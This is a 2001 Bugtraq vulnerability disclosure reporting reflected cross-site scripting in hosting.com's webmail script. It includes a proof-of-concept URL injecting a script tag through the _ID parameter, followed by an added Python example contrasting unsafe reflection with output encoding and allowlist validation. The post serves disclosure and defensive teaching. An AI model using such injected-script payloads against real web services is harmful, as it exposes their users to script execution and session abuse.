[23544] in bugtraq

Hosting.com Cross Site Scripting

daemon@ATHENA.MIT.EDU (E M)
Mon Dec 17 22:41:25 2001

From: "E M" <rdnktrk@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 17 Dec 2001 16:56:22 -0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F184OmKu2rhrKIhGhT000003cd4@hotmail.com>

Issue -

Most variables passed to the webmail script used by hosting.com (formerly 
CTSNet) execute script with local server context.


URL  : webmail.cts.com

Example :

http://webmail.cts.com/webmail.cgi?_ID=<SCRIPT>document.write("All%20Your%20Webmail%20is%20Belong%20to%20Us");</SCRIPT>


Vendor Status : Contacted 12.13.01 - Only automated reply.

Eric McCarty
rdnktrk@hotmail.com
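
Added example, not part of the original post and not hosting.com's code: a reflected `_ID` value rendered without encoding, with output encoding, and with allowlist validation, run against the URL from the advisory. The HTML template and the allowed `_ID` format are assumptions, since the post does not show how webmail.cgi builds its page.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# The example URL from the advisory, reused here as test input.
ADVISORY_URL = ('http://webmail.cts.com/webmail.cgi?_ID=<SCRIPT>document.write('
                '"All%20Your%20Webmail%20is%20Belong%20to%20Us");</SCRIPT>')

# Assumption: a session identifier needs only letters, digits, '-' and '_'.
ID_PATTERN = re.compile(r'[A-Za-z0-9_-]{1,64}')


def get_param(url, name):
    """Return the first percent-decoded value of a query parameter, or ''."""
    for pair in urlsplit(url).query.split('&'):
        key, _, value = pair.partition('=')
        if key == name:
            return unquote(value)
    return ''


def render_unsafe(session_id):
    """Hypothetical template that reflects the value unchanged (the flaw)."""
    return '<input type="hidden" name="_ID" value="' + session_id + '">'


def render_escaped(session_id):
    """Same template with HTML encoding applied at output time."""
    return ('<input type="hidden" name="_ID" value="'
            + html.escape(session_id, quote=True) + '">')


def render_validated(session_id):
    """Reject values outside the allowlist, then encode the rest anyway."""
    if not ID_PATTERN.fullmatch(session_id):
        return None  # caller should answer 400 and render nothing
    return render_escaped(session_id)


if __name__ == '__main__':
    value = get_param(ADVISORY_URL, '_ID')
    print(render_unsafe(value))     # markup reaches the browser as markup
    print(render_escaped(value))    # markup reaches the browser as text
    print(render_validated(value))  # None: request rejected
```

Encoding at output is what stops the script from running; the allowlist is a second layer and does not replace it.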




